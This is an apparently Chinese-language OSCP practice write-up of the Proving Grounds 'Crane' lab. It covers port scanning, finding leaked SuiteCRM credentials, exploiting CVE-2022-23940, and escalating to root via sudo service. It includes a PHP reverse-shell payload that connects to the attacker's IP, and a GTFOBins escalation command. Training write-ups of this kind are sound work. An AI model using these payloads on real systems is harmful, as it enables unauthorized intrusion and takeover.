OSCP Crane Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Crane

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界:

Web 目录枚举 –> README 文件得知应用版本 –> SuiteCRM 后台存在 RCE 漏洞 –> 逐个检索目录枚举的文件和目录 –> service 目录得到 will 用户密码 –> CVE-2022-23940 漏洞利用 –> www-data 用户权限 –> 用户旗帜

权限提升:

service sudo 提权 –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
6
7
sudo nmap -p- 192.168.147.146 --min-rate=2000

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3306/tcp  open  mysql
33060/tcp open  mysqlx

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
sudo nmap -p22,80,3306,33060 -sCV 192.168.147.146

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA)
|   256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA)
|_  256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry
|_/
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: SuiteCRM
|_Requested resource was index.php?action=Login&module=Users
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx  MySQL X protocol listener
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境,开放有 HTTP、SSH、Mysql、Mysqlx 服务。

3.2 渗透测试突破边界

3.2.1 信息搜集获取后台登录密码

访问系统 HTTP 80 端口,发现服务运行了 SugarCRM 系统,其中 Mysql 和 Mysqlx 服务均为兔子洞。

接下来进行目录枚举,发现大量可访问的文件和目录。

1
dirsearch -u http://192.168.147.146

优先访问 README.md 文件,该文件暴漏了系统版本信息。

1
SuiteCRM 7.12.3

检索应用漏洞时,发现应用该版本后台存在 RCE 漏洞。

参考链接:

1
https://github.com/manuelz120/CVE-2022-23940/tree/main

利用该漏洞需拥有应用后台的登录权限,这里卡了很久,在尝试寻找后台凭证花了很长时间,靶机的 3306 和 33060 端口也发挥了其兔子洞的威力。当你想要放弃并查看解题思路的时候,一定要重新整理思路,不要放弃每一个暴漏的细节,这将会是成功的关键,比起直接看答案,自己一步一步突破才是最大的提升。

回到目录枚举的结果,尝试对每个文件和目录进行排查,当排查到 service 目录时,在其 example 目录发现了测试页面。

测试页面可进行登录,且暴漏了用户名和密码信息。

将密码的前端代码删除加密,得到了明文的用户名和密码。

1
will/will

使用获取的密码可登录应用后台,并且该用户可创建计划报告,刚好符合之前检索的漏洞要求。

3.2.2 SuiteCRM 后台远程代码执行(CVE-2022-23940)

下载漏洞利用代码。

1
git clone https://github.com/manuelz120/CVE-2022-23940.git

kali 监听 4444 端口,执行漏洞利用,获取到系统 www-data 用户权限 shell。

1
2
nc -lvnp 4444
python3 exploit.py -h http://192.168.147.146 -u will -p will --payload "php -r '\$sock=fsockopen(\"192.168.45.155\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

升级为交互式 shell。

3.2.3 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 Service sudo 提权至 root 用户

查看系统 sudo 权限时,发现 www-data 用户可通过任意用户权限执行 service 命令,利用该配置可提权至系统 root 权限。

1
sudo -l

参考链接:

1
https://gtfobins.github.io/gtfobins/service/#sudo

1
sudo -u root /usr/sbin/service ../../bin/bash

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨

OffSec OSCP
#Linux #SuiteCRM 后台存在 RCE 漏洞 #CVE-2022-23940 漏洞利用
OSCP Crane Write-up
https://www.f0nesec.top/2025/08/23/oscp-crane/
作者
F0ne
发布于
2025年8月23日
许可协议